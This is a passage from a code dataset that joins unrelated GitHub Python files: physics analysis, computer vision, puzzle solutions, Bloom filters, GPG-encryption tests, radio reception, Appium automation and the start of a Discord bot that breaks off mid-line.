the first one means that the event contains a Bs that decayed to a JPsi (443) + X, \n # not counting the cases where Bs -> Bsbar -> JPsi + X\n .Define(\"Bsdecay\", \"MCParticle::get_decay(531, 443, false)(Particle, Particle1)\")\n .Define(\"Bsbardecay\", \"MCParticle::get_decay(-531, 443, false)(Particle, Particle1)\")\n\n\t # to get the distribution of the d0 of the mu+ track\n\t .Define(\"RecoMuplus_d0\", \"ReconstructedParticle2Track::getRP2TRK_D0( RecoMuplus, EFlowTrack_1) \")\n\t .Define(\"RecoMuplus_z0\", \"ReconstructedParticle2Track::getRP2TRK_Z0( RecoMuplus, EFlowTrack_1) \")\n\n\n )\n\n\n # select branches for output file\n branchList = ROOT.vector('string')()\n for branchName in [\n \"MC_PrimaryVertex\",\n \"ntracks\",\n #\"Bs2JPsiPhi_indices\",\n #\"Bs2MuMuKK_indices\",\n #\"Muplus\",\n #\"Muminus\",\n #\"Kplus\",\n #\"Kminus\",\n\n\t # Kinematics of the MC particles:\n \"Muplus_theta\",\n \"Muplus_phi\",\n \"Muplus_e\",\n \"Muminus_theta\",\n \"Muminus_phi\",\n \"Muminus_e\",\n \"Kplus_theta\",\n \"Kplus_phi\",\n \"Kplus_e\",\n \"Kminus_theta\",\n \"Kminus_phi\",\n \"Kminus_e\",\n \"Bs_theta\",\n \"Bs_phi\",\n \"Bs_e\",\n\n \"Bsdecay\",\n \"Bsbardecay\",\n\n # MC Bs decay vertex :\n \"BsMCDecayVertex\",\n\t\t# Reco'ed Bs vertex :\n \"BsVertex\",\n #\"BsTracks\",\n \"n_BsTracks\",\n\n \"deltaAlpha_max\",\n \"deltaAlpha_min\",\n \"deltaAlpha_ave\",\n #\"BsRecoParticles\",\n\n\t # Kinematics of the Reco'ed particles:\n \"RecoMuplus_theta\",\n \"RecoMuplus_phi\",\n \"RecoMuplus_e\",\n \"RecoMuminus_theta\",\n \"RecoMuminus_phi\",\n \"RecoMuminus_e\",\n \"RecoKplus_theta\",\n \"RecoKplus_phi\",\n \"RecoKplus_e\",\n \"RecoKminus_theta\",\n \"RecoKminus_phi\",\n \"RecoKminus_e\",\n\n \"RecoMuplus_atVertex_theta\",\n \"RecoMuplus_atVertex_phi\",\n \"RecoMuminus_atVertex_theta\",\n \"RecoMuminus_atVertex_phi\",\n \"RecoKplus_atVertex_theta\",\n \"RecoKplus_atVertex_phi\",\n \"RecoKminus_atVertex_theta\",\n \"RecoKminus_atVertex_phi\",\n\n \"Angle_JpsiPhi\",\n\n\t\t\"RecoMuplus_d0\",\n\t\t\"RecoMuplus_z0\"\n\n\n ]:\n branchList.push_back(branchName)\n df2.Snapshot(\"events\", self.outname, branchList)\n\n\n\nif __name__ == \"__main__\":\n\n if len(sys.argv)==1:\n print (\"usage:\")\n print (\"python \",sys.argv[0],\" file.root\")\n sys.exit(3)\n infile = sys.argv[1]\n #outDir = 'FCCee/'+sys.argv[0].split('/')[1]+'/'\n outDir = './'\n import os\n os.system(\"mkdir -p {}\".format(outDir))\n outfile = outDir+infile.split('/')[-1]\n ncpus = 0\n analysis = analysis(infile, outfile, ncpus)\n analysis.run()\n\n tf = ROOT.TFile(infile)\n entries = tf.events.GetEntries()\n p = ROOT.TParameter(int)( \"eventsProcessed\", entries)\n outf=ROOT.TFile(outfile,\"UPDATE\")\n p.Write()\n","repo_name":"HEP-FCC/FCCeePhysicsPerformance","sub_path":"case-studies/flavour/VertexExamples/analysis_Bs2JPsiPhi.py","file_name":"analysis_Bs2JPsiPhi.py","file_ext":"py","file_size_in_byte":16612,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"741921927","text":"import cv2\nfrom cvzone.HandTrackingModule import HandDetector\n\n\ncap = cv2.VideoCapture(0)\ncap.set(3, 1280)\ncap.set(4, 720)\ndetector = HandDetector(detectionCon=0.8, maxHands=4)\n\ncolorR = (255, 255, 255) # 方框原始颜色\ncx, cy = 100, 100 # 方框原始的中心位置qq\nw, h = 200, 200 # 方框的宽(weight)、高(height)\n\nwhile True:\n colorR = (255, 255, 255)\n\n success, img = cap.read()\n img = cv2.flip(img, 1) # 0-垂直翻转,1-水平翻转\n hands, img = detector.findHands(img, flipType=False)\n\n if hands:\n\n lmList = 
hands[0]['lmList']\n\n distance, _, _ = detector.findDistance(lmList[8], lmList[12], img) # 食指和中指间的距离\n\n cursor = lmList[8] # 食指的位置信息\n if distance < 90:\n if cx - w // 2 < cursor[0] < cx + w // 2 and cy - h // 2 < cursor[1] < cy + h // 2:\n colorR = (0, 255, 0)\n cx, cy = cursor\n\n # 图像框\n cv2.rectangle(img, (cx - w // 2, cy - h // 2), (cx + w // 2, cy + h // 2),\n color=colorR, thickness=cv2.FILLED)\n\n cv2.imshow('Image', img)\n cv2.waitKey(1)\n\n if cv2.waitKey(5) & 0xFF == ord('q'):\n break\n","repo_name":"dengfa02/CV_rookie","sub_path":"virtual_move.py","file_name":"virtual_move.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12931597817","text":"with open ('Day3/day_3') as f:\r\n data = f.read().splitlines()\r\n\r\n# Part 1\r\n\r\ncommon_values = [0,0,0,0,0,0,0,0,0,0,0,0]\r\nfor number in data:\r\n for i, bit in enumerate(number):\r\n common_values[i] += int(bit)\r\n\r\ngamma_rate = [\"1\" if (c > len(data)//2) else \"0\" for c in common_values ]\r\nepsilon_rate = []\r\nfor b in gamma_rate:\r\n epsilon_rate.append( \"1\" if b == \"0\" else \"0\" )\r\n\r\ngamma_rate = int(\"\".join(gamma_rate), 2)\r\nepsilon_rate = int(\"\".join(epsilon_rate), 2)\r\nprint(gamma_rate ,epsilon_rate, gamma_rate * epsilon_rate)\r\n\r\n# Part 2\r\n\r\ndef find_rating(data, pos = 0, bit_criteria = \"1\"):\r\n if len(data) == 1:\r\n return data[0]\r\n\r\n common_values = [0,0,0,0,0,0,0,0,0,0,0,0]\r\n for number in data:\r\n for i, bit in enumerate(number):\r\n common_values[i] += int(bit)\r\n\r\n if bit_criteria == \"1\":\r\n most_common = [1 if (c >= len(data)/2) else 0 for c in common_values]\r\n if bit_criteria == \"0\":\r\n most_common = [0 if (c >= len(data)/2) else 1 for c in common_values]\r\n\r\n new_list = []\r\n for v in data:\r\n if int(v[pos]) == most_common[pos]:\r\n new_list.append(v)\r\n\r\n return find_rating(new_list, pos + 1, bit_criteria)\r\n\r\noxygen_generator_rating = int(find_rating(data, 0, \"1\"), 2)\r\nCO2_scrubber_rating = int(find_rating(data, 0, \"0\"), 2)\r\n\r\nprint(oxygen_generator_rating, CO2_scrubber_rating, oxygen_generator_rating * CO2_scrubber_rating)","repo_name":"Wolfy7/AdventOfCode2021","sub_path":"Day3/day_3.py","file_name":"day_3.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28183663720","text":"from game.gui_components.objects.game_object import Game_Object\nimport random\nfrom constants import(\n SCREEN_WIDTH,\n SCREEN_HEIGHT\n)\nclass Fog(Game_Object):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.image = \"FogT4\"\n self.rotation = 90 * random.randint(0,3)\n\n def draw(self, centered_object):\n\n x = self.x - centered_object.x + SCREEN_WIDTH/ 2\n y = self.y - centered_object.y + SCREEN_HEIGHT/ 2\n self.sprite.draw(x, y)\n ","repo_name":"dsjensen19/Final-Project","sub_path":"game/gui_components/objects/fog.py","file_name":"fog.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27962341276","text":"from math import log\n\n\ndef get_bloom_filters_parameters(rdd, false_positive_ratio):\n \"\"\"\n Given a rdd of films and ratings return a dictionary of parameters n, m ,k for every rating.\n Input: rdd of filmId, rating.\n Output: Dictionary of {rating: [n, m, k]} sorted for rating.\n \"\"\"\n rdd = rdd.map(lambda x: 
[round(float(x[1])), x[0]]) # map the rdd in the form (rating, film)\n rdd = rdd.map(lambda x: (x[0], 1))\n rdd = rdd.reduceByKey(lambda x, y: x+y)\n rdd = rdd.map(lambda x: get_parameters(x, false_positive_ratio)) # map parameters to every rating\n rdd = rdd.sortByKey() # sort ratings\n rdd.saveAsTextFile(f\"./Data/Output/Parameters\")\n bloom_parameters = rdd.collect()\n bloom_parameters = {parameter[0]: parameter[1] for parameter in bloom_parameters} # transform the list of lists\n # in a dictionary\n return bloom_parameters\n\n\ndef get_parameters(x, false_positive_ratio):\n \"\"\"\n Return parameters n,m and k for the Bloom filter construction.\n Input: (rating, list[filmId])\n Output: (rating, [n, m, k])\n \"\"\"\n n = x[1]\n m = round(-((n * log(false_positive_ratio)) / (log(2)) ** 2))\n k = round((m / n) * log(2))\n return x[0], [n, m, k]\n\n","repo_name":"EhiSuper/BloomFilterInSpark","sub_path":"src/BloomFiltersParameters.py","file_name":"BloomFiltersParameters.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6266584811","text":"from re import compile\nfrom chars import *\n\nKEYWORDS = set('''\n if elif else\n from import as\n for in while\n True False None\n try except finally\n async def = := lambda del\n await return yield raise\n + - * ** / % @ & | ^\n += -= *= **= /= %= @= &= |= ^=\n == > < is\n != <= >=\n and or not\n ( ) [ ] { } : . ,\n'''.strip().split())\n\ndef _fullmatch(regex):\n return compile(regex).fullmatch\n\ndecimal = _fullmatch('[+-]?(0|[1-9](_?[0-9])*)(\\.([0-9](_?[0-9])*)?)?(e[0-9](_?[0-9])*)?')\noctal = _fullmatch('[+-]?0o[_0-7]+')\noctal = _fullmatch('[+-]?0x[_0-9a-fA-F]+')\nbinary = _fullmatch('[+-]?0b[_01]+')\nident = _fullmatch('[_a-zA-Z][_a-zA-Z0-9]*')\n\ndef number(w):\n return decimal(w) or octal(w) or binary(w)\n\ndef quoted(w) -> 'end_quote' or None:\n if w[0] in QUOTE_CHARS:\n return w[0]\n if len(w) > 1 and w[0] in ('f', 'r') and w[1] in QUOTE_CHARS:\n return w[1]\n\ndef balanced_braces(w):\n imbalance = 0\n found = False\n for c in w:\n if c == '{':\n imbalance += 1\n elif c == '}':\n imbalance -= 1\n found = True\n return found and not imbalance\n","repo_name":"qguv/pysh","sub_path":"patterns.py","file_name":"patterns.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"10377507308","text":"#: 1일 될때까지 예제의 시간복잡도, 공간 복잡도를 분석한다.\nimport time\nimport os \nimport psutil \nprocess=psutil.Process(os.getpid())\nstart_time=time.time()\n\n\n#n,k=map(int,input('두 수를 공백으로 분리하여 입력하시오>').split()) # N, K을 공백을 기준으로 구분하여 입력 받기\nn=25\nk=4\nresult = 0\nwhile True: # 반복 루프 시작\n target =(n//k)*k \n# K로 나누어 지는 수를 구함, 예) 25 나누기 4 곱하기 4 = 처음 24\n result += (n - target) # N이 K로 나누어 떨어지는 수가 될 때까지 빼기, 1\n n = target # 25를 24로 수정\n if n < k: # N이 K보다 작을 때 (더 이상 나눌 수 없을 때) 반복문 탈출\n break\n result += 1 # 횟수 증가\n n //= k # K로 나누기, n = 6\nresult += (n - 1) # 마지막으로 남은 수에 대하여 1씩 빼기, 6, 5 --> 4일때까지 2번 추가 빼기, 마지막 1번 나누고\nprint(\"1이 도달하기 까지 연산 횟수 :\", result) # 총 5번 횟수 연산\n\n\nend_time=time.time() \nprint(\"time:\",format(end_time-start_time,'.10f'))\nprint('MB bytes:',process.memory_info().rss/(1024.0*1024.0))\n","repo_name":"heosujinnn/py_algorithm","sub_path":"DAY3/1_PLEASE_EX1.py","file_name":"1_PLEASE_EX1.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 
+{"seq_id":"35335682385","text":"#!/usr/bin/env python3\n'''\nTest Module which Checks if all files that are pushed to gitlab\nare encrypted the right way\n'''\nimport os\nimport unittest\nimport re\nimport gnupg\nimport yaml\nfrom pprint import PrettyPrinter\nfrom multivault.utilities import util_crypt\nfrom multivault.base import config\nfrom multivault.utilities import util_ldap\n\n\nTESTING_FILE = 'multivault-gitlabtest.yml'\nANSIBLE = None\nDIR_PATH = os.path.dirname(os.path.realpath(__file__))\nROOT_PATH = os.path.join(DIR_PATH, \"..\", \"..\")\nCONF_PATH = os.path.join(DIR_PATH, TESTING_FILE)\nconfig.init(conf_path=CONF_PATH)\nANSIBLE_PATH = os.path.join(DIR_PATH, \"..\", \"..\", \"all.yml\")\nINVENTORY_PATH = os.path.join(DIR_PATH, \"..\", \"..\", \"inventory.ini\")\nKEY_PATH = os.path.join(DIR_PATH, \"..\", \"..\", \"temp\", \"keys\")\nGNUPG_PATH = os.path.join(DIR_PATH, \"..\", \"..\", \"temp\", \"keyring\")\nGNUPG = gnupg.GPG(gnupghome=GNUPG_PATH)\nwith open(ANSIBLE_PATH, \"r\") as ANSIBLE_PT:\n ANSIBLE = yaml.load(ANSIBLE_PT)\nPATTERN = re.compile(\n r'^(?Proles/(?P.*?)/gpg/(?P.*?\\.gpg))$', re.MULTILINE)\nPATTERN2 = re.compile(r'^\\s*(.*?)\\.server\\.selfnet\\.de$', re.MULTILINE)\nPATTERN3 = re.compile(r'^:pubkey.*?keyid (.*?)$', re.MULTILINE)\n\n#config.LDAP_SSH_HOP = 'login'\n\n\nclass TestChangedFiles(unittest.TestCase):\n '''\n Test Class for the gpg check\n '''\n\n def test_changed_files(self):\n '''\n Gets the Information from the changed file and from ldap and the gpg repo\n Validates if a file is encrypted for the right users\n '''\n config.init(conf_path=CONF_PATH)\n util_crypt.update_git_repo(config.GPG_REPO, path=KEY_PATH)\n files = construct_gpg_information(\"master\")\n printer = PrettyPrinter(indent=2)\n for file_info in files:\n print(file_info['filename'])\n print(\n \"+--- Encrypted for {}:\".format(file_info['encrypted_for']))\n users = extract_subkey_for_every_user(file_info['users'])\n if users:\n for user, data in users.items():\n for key in data.keys():\n if key in file_info['encrypted_for']:\n users[user][key]['encrypted_for'] = True\n else:\n pass\n printer.pprint(users)\n for user, data in users.items():\n if user == 'tobiass' or user == 'sebastiann' or user == 'jo':\n self.assertFalse(check_encrypted_for_user(data))\n else:\n self.assertTrue(check_encrypted_for_user(data))\n else:\n pass\n\n\ndef check_encrypted_for_user(key_data):\n '''\n checks for an encryption with one key of an user:\n '''\n for key in key_data.keys():\n if key_data[key]['encrypted_for']:\n return True\n else:\n pass\n return False\n\n\ndef extract_subkey_for_every_user(key_information):\n '''\n Extracts the information out of the\n gnupg.GPG.scan_keys() inside of the file_info object\n '''\n subkeys = {}\n if not key_information:\n return None\n for user, data in key_information.items():\n subkeys[user] = {}\n if data:\n data = data[0]\n for subkey, expire_date in data['subkeys']:\n subkeys[user][subkey] = {}\n subkeys[user][subkey]['expire_date'] = expire_date\n subkeys[user][subkey]['encrypted_for'] = False\n else:\n data = None\n return subkeys\n\n\ndef get_hosts(group_name):\n '''\n Get the hosts out of the\n ansible inventori.ini file\n '''\n return extract_hosts(\n util_crypt.run_cmd(\n [\"ansible\",\n group_name,\n \"-i\",\n INVENTORY_PATH,\n \"--list-hosts\"]))\n\n\ndef get_file_info(file_path):\n '''\n extracts the information out of the gpg file\n given py\n @param file_path\n '''\n return extract_keys(util_crypt.run_cmd([\"gpg\", \"--list-packets\", \"--list-only\", 
file_path]))\n\n\ndef changed_files(base, ahead):\n '''\n returns all files that differ from base branch\n @param base the base branch\n @param ahead the actual branch\n @return list_of_files by function @method extract()\n '''\n return extract(util_crypt.run_cmd([\"git\", \"diff\", \"--name-only\", base, ahead, \"--\"]))\n\n\ndef all_files(branch):\n '''\n returns all files tracked inside the given branch\n @param branch the branch to list the files of\n @return list_of_all_files @method extract()\n '''\n return extract(util_crypt.run_cmd([\"git\", \"ls-tree\", \"-r\", \"--name-only\", branch]))\n\n\ndef extract(output):\n '''\n Uses regex to extract files from cli\n should be used only in a method _files\n @param output output of @method all_files or @method changed_files\n @return list_of_extracted_files\n '''\n return [m.groupdict() for m in PATTERN.finditer(output)]\n\n\ndef extract_hosts(output):\n '''\n extracts the hosts from cli output of @method get_hosts(...)\n @param output of a subprocess call\n @return list_of_matching_hostnames\n '''\n if '[WARNING]:' in output:\n return None\n return PATTERN2.findall(output)\n\n\ndef extract_keys(output):\n '''\n extract the keys from the cli output of @method get_file_info()\n @param output output of cli\n @return list_of_keys_encrypted_for\n '''\n return PATTERN3.findall(output)\n\n\ndef construct_file_host_role_mapping(files):\n '''\n Reads the all.yml file from ansible and\n substitutes the groups to hostname_lists\n @param files gpg files with extracted role\n @return dict dict with files and their hostnames\n '''\n for playbook in ANSIBLE[1:]:\n hosts = playbook['hosts']\n roles = playbook['roles']\n for fil in files:\n if fil['role'] in roles:\n fil['hosts'] = get_hosts(hosts)\n return files\n\n\ndef construct_gpg_information(base, ahead=\"HEAD\", whole=False):\n '''\n Merges all methods from above to an big\n dictionary\n @param base base branch\n @param ahead actual branch defaults to current HEAD of branch\n @param whole if set to true the whole indexed files are checked\n @return files_and_hosts big dictionary with much information about the files\n '''\n if whole:\n changed = all_files(base)\n else:\n if not ahead:\n return None\n changed = changed_files(base, ahead)\n files_and_hosts = construct_file_host_role_mapping(changed)\n for file_meta in files_and_hosts:\n if 'hosts' in file_meta:\n users = util_ldap.get_authorized(file_meta['hosts'])\n else:\n users = None\n file_meta['path'] = file_meta['path'].split('/')\n path = ROOT_PATH\n for part in file_meta['path']:\n path = os.path.join(path, part)\n file_meta['encrypted_for'] = get_file_info(path)\n gpg_mapping = {}\n if users:\n for user,_ in users:\n gpg_key_file = os.path.join(KEY_PATH, user + \".gpg\")\n if os.path.exists(gpg_key_file):\n gpg_mapping[user] = GNUPG.scan_keys(gpg_key_file)\n else:\n gpg_mapping[user] = None\n file_meta['users'] = gpg_mapping\n else:\n file_meta['users'] = None\n return files_and_hosts\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"Selfnet/multivault","sub_path":"tests/test_role_changes.py","file_name":"test_role_changes.py","file_ext":"py","file_size_in_byte":7560,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"35635639052","text":"#!/usr/bin/python\n\nimport time\nimport RPi.GPIO as GPIO \nfrom RFM69 import Radio, FREQ_433MHZ\n\nfrequency = 434000000 \nmyEncryptionKey = \"cansxINDA\"\nnumber = 0\n\nprint (\"Starting reception program\")\n\ntry:\n with 
Radio(FREQ_433MHZ, nodeID=2, networkID=100, isHighPower=True, verbose=False, interruptPin=18, resetPin=22, spiDevice=0, autoAcknowledge=False, encryptionKey=myEncryptionKey) as radio, open('database.csv', 'a+') as output:\n print(\"Starting receiving data...\")\n \n radio.calibrate_radio()\n radio.set_power_level(100)\n radio.set_frequency_in_Hz(frequency)\n \n while True:\n number += 1\n \n packet = radio.get_packet(timeout=1)\n \n if packet is not None:\n datas = packet.to_dict()\n print(\"Message %s, RSSI %s= %s\" % (str(number), datas['rssi'], packet.data_string))\n print(\"%s,%s,%s\" % (str(number), datas['rssi'], packet.data_string), file=output)\nfinally:\n GPIO.cleanup()\n","repo_name":"leopard3l/cansx","sub_path":"receive_data.py","file_name":"receive_data.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26525305679","text":"# http://hamukazu.com/2014/09/26/scipy-sparse-basics/\nfrom scipy.sparse import lil_matrix, csr_matrix\n\n# prepare sparse matrix a (a 3x3 all-zero matrix)\n# return <3x3 sparse matrix in LIL format>\n# a = lil_matrix([3, 3])\na = lil_matrix((3, 3)) # passing a list raises an error when setting values, so pass a tuple\n\n# set the non-zero elements\na[0, 0] = 1; a[0, 2] = 2\n\n# convert the lil_matrix to a csr_matrix\n# return <3x3 sparse matrix in CSR format>\na = a.tocsr()\n\n# prepare sparse matrix b\nb = lil_matrix((3, 3))\n\n# add the non-zero elements\nb[1, 1] = 3; b[2, 0] = 4; b[2, 2] = 5\n\n# convert the lil_matrix to a csr_matrix\nb = b.tocsr()\n\n# compute the product of a and b\n# why dot? https://qiita.com/masafumi_miya/items/640800cef813acf70caf\nc = a.dot(b)\n\n# compute the sum of a and b\nd = a + b\n\nprint(d.toarray())\n# toarray() visualizes / casts the sparse matrix to a dense array\n# return <3x3 sparse matrix in CSR format>\n# print(c.toarray())\n","repo_name":"urasin/count_vectorizer","sub_path":"study_sparse_matrix.py","file_name":"study_sparse_matrix.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37861597912","text":"from unittest import TestCase\nfrom functools import reduce\nfrom math import exp, ceil\nfrom bloomfilter import union, intersection, element, optimal_hash_runs, optimal_filter_bits, len as bf_len\nfrom bloomfilter import _DEFAULT_HASH_RUNS, _DEFAULT_FILTER_BITS\n\n\nclass TestUtils(TestCase):\n def test_optimal_hash_runs(self):\n self.assertEqual(optimal_hash_runs(2000, 16384), 6)\n self.assertEqual(optimal_hash_runs(200, 4096), 14)\n self.assertEqual(optimal_hash_runs(32, 8096), 175)\n\n def test_optimal_filter_bits(self):\n self.assertEqual(optimal_filter_bits(1000, 0.01), 9586)\n self.assertEqual(optimal_filter_bits(100, 0.01), 959)\n\n\nclass TestBloomFilter(TestCase):\n def test_element_is_deterministic(self):\n e1 = element(b\"element\")\n e2 = element(b\"element\")\n\n self.assertEqual(e1, e2)\n\n def test_element_is_int(self):\n e = element(b\"element\")\n\n self.assertTrue(type(e) is int)\n\n def test_intersection_duplicates(self):\n e1 = element(b\"element 1\")\n\n self.assertEqual(intersection(e1, e1),\n e1)\n\n def test_intersection_unions(self):\n e1 = element(b\"element 1\")\n e2 = element(b\"element 2\")\n e3 = element(b\"element 3\")\n\n self.assertEqual(intersection(union(e1, e2, e3),\n union(e1, e2)),\n union(e1, e2))\n\n def test_union_nests(self):\n e1 = element(b\"element 1\")\n e2 = element(b\"element 2\")\n e3 = element(b\"element 3\")\n\n self.assertEqual(union(e1, e2, e3),\n union(e1,\n union(e2, e3)))\n\n def test_false_positive_rate(self, item_count=1000, bloom_size=_DEFAULT_FILTER_BITS, bloom_hashes=_DEFAULT_HASH_RUNS):\n bloom = reduce(union,\n map(lambda c: 
element(c.to_bytes(c.bit_length(), byteorder='big'),\n bloom_size,\n bloom_hashes),\n range(item_count)))\n false_positive_probability = pow(1 - exp(-bloom_hashes / (bloom_size / item_count)), bloom_hashes)\n\n false_positives = 0\n for c in range(item_count * 2):\n new_c = c + item_count\n e = element(new_c.to_bytes(new_c.bit_length(), byteorder='big'),\n bloom_size,\n bloom_hashes)\n if intersection(bloom, e) == e:\n false_positives += 1\n false_positive_ratio = false_positives / (item_count * 2)\n max_deviation = false_positive_probability * 0.075\n self.assertAlmostEqual(false_positive_ratio, false_positive_probability, delta=max_deviation)\n\n def test_false_positive_rate_at_different_settings(self):\n for test_args in (dict(item_count=3000, bloom_size=_DEFAULT_FILTER_BITS * 2, bloom_hashes=_DEFAULT_HASH_RUNS // 2),\n dict(item_count=300, bloom_size=_DEFAULT_FILTER_BITS // 2, bloom_hashes=_DEFAULT_HASH_RUNS * 2),\n dict(item_count=1100, bloom_size=_DEFAULT_FILTER_BITS * 2, bloom_hashes=_DEFAULT_HASH_RUNS * 2),\n dict(item_count=1000, bloom_size=_DEFAULT_FILTER_BITS, bloom_hashes=optimal_hash_runs(2000, _DEFAULT_FILTER_BITS))\n ):\n with self.subTest(**test_args):\n self.test_false_positive_rate(**test_args)\n\n def test_len(self):\n bloom = 0b0\n for c in range(1, 1001):\n bloom = union(bloom, element(b\"element \" + str(c).encode()))\n with self.subTest(c=c):\n self.assertAlmostEqual(bf_len(bloom), c, delta=ceil(c * 0.025))\n","repo_name":"tommyvn/bloomfilter","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17283918284","text":"import csv\n\n# Define the input and output file names\ninput_file = 'C:\\\\Users\\\\quchenfu\\\\Downloads\\\\ml-stuttering-events-dataset\\\\SEP-28k_labels_old.csv'\noutput_file = 'C:\\\\Users\\\\quchenfu\\\\Downloads\\\\ml-stuttering-events-dataset\\\\SEP-28k_labels.csv'\n\n# List of strings to remove from the lines\nstrings_to_remove = ['StutteringIsCool', 'StrongVoices']\n\n# Open the input and output CSV files\nwith open(input_file, mode='r', newline='') as infile, open(output_file, mode='w', newline='') as outfile:\n reader = csv.reader(infile)\n writer = csv.writer(outfile)\n\n # Iterate through each row in the input CSV\n for row in reader:\n # Check if any of the strings to remove are in the row\n if not any(s in ' '.join(row) for s in strings_to_remove):\n # If none of the strings are found, write the row to the output CSV\n writer.writerow(row)\n\nprint(f\"Filtered data written to {output_file}\")\n","repo_name":"QuchenFu/stuttering_detection","sub_path":"models/remove.py","file_name":"remove.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"4836112689","text":"from appium import webdriver\nimport time\n\n\ndesired_caps = {\n \"platformName\": \"Android\",\n \"platformVersion\": \"10\",\n \"automationName\": \"UiAutomator2\",\n \"appActivity\": \".MainActivity\",\n \"appPackage\": \"com.example.chapp_poc\",\n \"deviceName\": \"2NSDU20411004107\",\n \"newCommandTimeout\": 7200,\n \"noReset\": True\n}\n\ndriver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)\n\ntime.sleep(2)\n\nstart_time = time.time()\nbtn = driver.find_element_by_xpath(\"//*[contains(@text, '纽崔莱')]\")\nend_time = time.time()\n\nprint(\"cost time is: {}\".format(end_time - start_time))\n\nstart_time = 
time.time()\nbtn.click()\nend_time = time.time()\n\nprint(\"cost time is: {}\".format(end_time - start_time))\n\n","repo_name":"sayidkongtao/scripts","sub_path":"demo/python_appium_demo_chapp_poc.py","file_name":"python_appium_demo_chapp_poc.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31897523509","text":"import os\nimport math\nimport qrcode\nimport random\nimport asyncio\nimport discord\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# import Discord UI and Constants\nfrom view import *\nfrom constants import *\n\nfrom replit import db\nfrom datetime import datetime\nfrom meme import meme_stealer\nfrom keep_alive import keep_alive\nfrom web_scrapping import find_jobs\nfrom mcv_notify import get_notifications\nfrom apscheduler.triggers.cron import CronTrigger\nfrom apscheduler.schedulers.asyncio import AsyncIOScheduler\n\n\n# initialize data in replit's database\nif \"interact\" not in db.keys():\n db[\"interact\"] = interact\n\nif \"responding\" not in db.keys():\n db[\"responding\"] = True\n\n\n# function to add a word to the database\ndef add_words(new_word):\n if \"interact\" in db.keys():\n interact = db[\"interact\"]\n interact.append(new_word)\n db[\"interact\"] = interact\n else:\n db[\"interact\"] = [new_word]\n\n\n# function to delete a word from the database\ndef delete_word(index):\n interact = db[\"interact\"]\n\n if index.isdigit():\n index = int(index)\n if len(interact) > index:\n del interact[index]\n db[\"interact\"] = interact\n\n elif index in interact:\n interact.remove(index)\n db[\"interact\"] = interact\n\n\n# inform daily schedule\nasync def inform():\n await client.wait_until_ready()\n day_of_week = datetime.today().strftime('%A').lower()\n if (day_of_week != \"saturday\") and (day_of_week != \"sunday\"):\n embedVar = discord.Embed(\n title=\"Schedule\",\n url=CP_DOCS,\n description=schedule[day_of_week],\n color=discord.Color.blue()\n )\n embedVar.add_field(\n name=\"Days of week\",\n value=\"For \" + datetime.today().strftime('%A') +\n \" | [MCV](https://www.mycourseville.com/?q=courseville)\" +\n \" [Grader](https://nattee.net/grader)\",\n inline=False\n )\n\n # embedVar.set_author(name=\"\", icon_url=\"\")\n study_room_channel = client.get_channel(808174559529926666)\n Aqioz_id = os.environ['AQIOZ_ID']\n await study_room_channel.send(f\"มาเรียนว้อย {Aqioz_id}\")\n await study_room_channel.send(embed=embedVar)\n\n\n# Class Client\nclass DiscordClient(discord.Client):\n\n # introduce yourself\n async def on_ready(self):\n await client.wait_until_ready()\n await client.change_presence(activity=discord.Game(name=\"$help\"))\n print('We have logged in as {0.user}'.format(client))\n\n # initializing scheduler -> London : timezone=\"Asia/Bangkok\"\n scheduler = AsyncIOScheduler()\n\n # sends inform at 7 AM (Local Time = London)\n scheduler.add_job(inform, CronTrigger(hour=\"0\", minute=\"0\", second=\"1\"))\n scheduler.start()\n\n # react to words and commands\n async def on_message(self, message):\n global interact\n msg = message.content\n\n # do not reply to itself\n if message.author == client.user:\n return\n\n # responding\n if db[\"responding\"]:\n option = interact\n if \"interact\" in db.keys():\n option = option + list(db[\"interact\"])\n\n if any(word in msg for word in words):\n await message.channel.send(random.choice(option))\n\n # detected words\n if msg.startswith('ไป'):\n await message.reply('ไกปู', mention_author=True)\n\n if msg.startswith('สีเหลือง'):\n await 
